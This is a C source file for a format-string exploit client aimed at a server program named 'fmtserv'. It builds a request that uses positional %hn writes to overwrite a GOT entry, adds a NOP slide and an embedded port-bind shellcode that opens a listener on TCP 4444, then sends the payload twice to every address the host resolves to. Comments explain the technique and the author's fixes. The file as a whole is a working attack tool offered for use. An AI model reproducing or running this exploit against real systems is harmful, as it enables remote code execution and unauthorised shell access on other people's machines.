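#define _POSIX_C_SOURCE 200112L

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

/*
 * fmtserv format-string exploit client.
 *
 * Builds one request that abuses a format-string bug in the target: the
 * request starts with the two halves of a GOT entry's address, followed by
 * two "%.Nx" padding conversions and two positional "%N$hn" short writes, so
 * that the vulnerable *printf call on the server overwrites GOTADDR with
 * RETADDR.  A NOP slide and a port-bind shellcode follow the format part.
 *
 * Every constant below is target specific (binary, libc, stack layout) and
 * has to be re-derived per host; the values here are the author's.
 */
#define GOTADDR 0x0804a030 /* snprintf() GOT slot --> objdump -R fmtserv */
#define RETADDR 0x41414141 /* return address: must land in the NOP slide */
#define OFFSET 4           /* printf argument index at which the request buffer sits on the target stack */
#define SIZE 1024          /* request buffer capacity */
#define NOP_LEN 512        /* length of the NOP slide in front of the shellcode */
#define DELIVERIES 2       /* the original sent the payload twice to every address; presumably the
                              second call through the overwritten GOT entry is the trigger -- confirm */

/* Port-bind shellcode, listens on TCP 4444.  Contains no NUL byte, so it
 * survives C-string handling on the target (the original copied it with %s). */
static const unsigned char shellcode[] =
    "\x33\xc9\xb1\x17\xdb\xdf\xd9\x74\x24\xf4\xbb\xeb\xfe\xc9"
    "\xcd\x5a\x31\x5a\x16\x03\x5a\x16\x83\xc2\x04\xe2\x1e\xcf"
    "\x12\x9e\xa3\x63\xcf\x2b\xaa\x65\x65\x4a\xf4\xa8\xfa\x04"
    "\x9d\x61\xa9\x7a\xcf\xd7\x1f\x1d\x87\xc6\xc3\x87\x3f\xe3"
    "\xfb\xce\x5e\x99\xe7\x81\xf6\xd7\xf9\x61\x9c\x81\xa1\xa8"
    "\xe0\xfe\x34\x80\xe4\x33\x38\xb4\xb6\x9d\xb0\xd8\x75\x92"
    "\xa5\xd7\xf9\x41\x70\x82\xc6\x3d\x4e\xd2\x71\xc7\xa8\xbb"
    "\xae\x18\x3a\x54\xd8\x49\xde\xcd\x76\x1f\xfd\x5e\xd5\x96"
    "\xe3\xef\xd2\x65\x63\x05";

/* Store v at p as 4 little-endian bytes (the target is 32-bit x86). */
static void put_le32(char *p, uint32_t v)
{
    p[0] = (char)(v & 0xff);
    p[1] = (char)((v >> 8) & 0xff);
    p[2] = (char)((v >> 16) & 0xff);
    p[3] = (char)((v >> 24) & 0xff);
}

/*
 * Build the exploit request into buf (capacity cap).
 *
 * Layout:
 *   [got+2][got] %.<p1>x%<off>$hn %.<p2>x%<off+1>$hn <NOP slide> <shellcode> \r\n
 *
 * The first %hn stores the high 16 bits of ret into got+2, the second the
 * low 16 bits into got.  p1 and p2 are chosen so that the running character
 * count equals each half at the moment of its write (the 8 address bytes
 * already count towards the first one).
 *
 * Returns the request length, or 0 when it does not fit in cap or when one
 * of the two address words contains a NUL byte (it would be cut off by any
 * C-string handling on the target; the original silently truncated there).
 *
 * NOTE: mixing unnumbered (%.Nx) and numbered (%N$hn) conversions is
 * undefined by POSIX; the exploit relies on glibc's behaviour -- confirm
 * against the target libc.
 */
static size_t build_payload(char *buf, size_t cap, uint32_t ret, uint32_t got, int off)
{
    unsigned long high = (ret >> 16) & 0xffff;
    unsigned long low = ret & 0xffff;
    size_t pos = 0;
    size_t i;
    int n;

    if (cap < 8)
        return 0;

    /* The original emitted the addresses with "%s" over an array of host
     * pointers, which is only correct when this client itself is a 32-bit
     * build; write them explicitly instead. */
    put_le32(buf + 0, got + 2);
    put_le32(buf + 4, got);
    for (i = 0; i < 8; i++) {
        if (buf[i] == '\0')
            return 0;
    }
    pos = 8;

    /* %hn stores the count mod 2^16, so adding 0x10000 never changes what
     * is written but keeps both precisions >= 8.  A precision is only a
     * minimum digit count: a 32-bit stack value prints up to 8 hex digits
     * and would otherwise skew the counter (the original used "%.0x" when
     * both halves of RETADDR were equal). */
    if (high < 16)
        high += 0x10000;
    if (low < high + 8)
        low += 0x10000;

    n = snprintf(buf + pos, cap - pos, "%%.%lux%%%d$hn%%.%lux%%%d$hn",
                 high - 8, off, low - high, off + 1);
    if (n < 0 || (size_t)n >= cap - pos)
        return 0;
    pos += (size_t)n;

    /* NOP slide, shellcode (full length, not %s-truncated) and line end.
     * The length is tracked explicitly; the original ran strlen() over a
     * NOP region that was never NUL-terminated. */
    if (cap - pos < NOP_LEN + (sizeof shellcode - 1) + 2)
        return 0;
    memset(buf + pos, 0x90, NOP_LEN);
    pos += NOP_LEN;
    memcpy(buf + pos, shellcode, sizeof shellcode - 1);
    pos += sizeof shellcode - 1;
    buf[pos++] = '\r';
    buf[pos++] = '\n';
    return pos;
}

/*
 * Connect to every address in list and send the payload on each one.
 * Returns the number of successful sends.  Each socket is closed after
 * use; a failure on one address is reported and the next one is tried.
 */
static int deliver(const struct addrinfo *list, const char *payload, size_t len)
{
    const struct addrinfo *ai;
    int sent = 0;

    for (ai = list; ai != NULL; ai = ai->ai_next) {
        int s = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (s < 0) {
            perror("socket");
            continue;
        }
        if (connect(s, ai->ai_addr, ai->ai_addrlen) < 0) {
            perror("connect");
            close(s);
            continue;
        }
        if (send(s, payload, len, 0) != (ssize_t)len)
            perror("send");
        else
            sent++;
        close(s);
    }
    return sent;
}

/*
 * Usage: fmtserv-exploit host port
 *
 * Resolves host:port, builds the request and delivers it DELIVERIES times
 * to every resolved address.  Exits non-zero when the payload cannot be
 * built, the name does not resolve, or no send succeeded.
 */
int main(int argc, char *argv[])
{
    char buffer[SIZE];
    size_t len;
    struct addrinfo hints, *res;
    int rc, pass, sent = 0;

    if (argc < 3) {
        printf("Usage: %s host port\n", argv[0]);
        return 0;
    }

    len = build_payload(buffer, sizeof buffer, RETADDR, GOTADDR, OFFSET);
    if (len == 0) {
        fprintf(stderr, "payload does not fit in %d bytes or GOT address contains a NUL byte\n", SIZE);
        return EXIT_FAILURE;
    }

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    rc = getaddrinfo(argv[1], argv[2], &hints, &res);
    if (rc != 0) {
        fprintf(stderr, "Cannot resolve requested address: %s\n", gai_strerror(rc));
        return EXIT_FAILURE;
    }

    for (pass = 0; pass < DELIVERIES; pass++)
        sent += deliver(res, buffer, len);

    freeaddrinfo(res);
    return sent > 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}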